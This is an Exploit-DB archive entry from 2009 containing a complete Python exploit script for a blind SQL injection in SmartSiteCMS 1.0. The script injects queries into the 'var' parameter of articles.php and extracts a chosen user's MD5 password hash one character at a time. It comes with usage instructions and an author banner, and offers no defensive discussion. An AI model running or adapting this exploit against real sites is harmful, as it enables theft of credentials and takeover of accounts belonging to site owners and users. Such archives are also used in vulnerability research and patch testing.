SmartSiteCMS 1.0 - Blind SQL Injection

EDB-ID:

7901




Platform:

PHP

Date:

2009-01-28


#!/usr/bin/python

import sys
import re
from socket import *

class exploit:
	def __init__(self,host,path,user):
		self.host=host
		self.path=path
		self.user=user
		self.reg=re.compile("<!-- END COMMENT FORM -->")
	def set_query(self,n,ch):
		self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
		self.query = self.query.replace(" ","%20")
		self.query = self.query.replace("'","%27")
		self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
	def check(self):
		sock=socket(AF_INET, SOCK_STREAM)
		sock.connect((self.host, 80))
		sock.send(self.request)
		r=""
		t="-"
		while(t!=""):
			t=sock.recv(1024)
			r+=t
		match=self.reg.search(r)
		if(r[match.start()+27:match.start()+59]!="<!-- END OF RELATED ARTICLES -->"):
			return 1
		else:
			return 0
		sock.close()

print "////*****************************************\\\\\\\\"
print "||||           smartSiteCMS 1.0 v1.0         ||||"
print "||||            Blind SQL injection          ||||"
print "||||					     ||||"
print "|||| ~Author: certaindeath                   ||||"
print "|||| ~Greetz: darkjoker                      ||||"
print "\\\\\\\\*****************************************////\n"

if(len(sys.argv) !=4 ):
	print "Usage:	python xpl.py <host> <cms path> <user>"
	print "Example: python xpl.py localhost /cms admin"
	sys.exit(0)

pwd=""
xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3])
n=1
while(n<=32):
	t=0
	xpl.set_query(n,str(t))
	while (xpl.check()!=1):
		t+=1
		xpl.set_query(n,str(hex(t))[-1])
	pwd+=str(hex(t))[-1]
	n+=1
print "pass [md5]: ",pwd

# milw0rm.com [2009-01-28]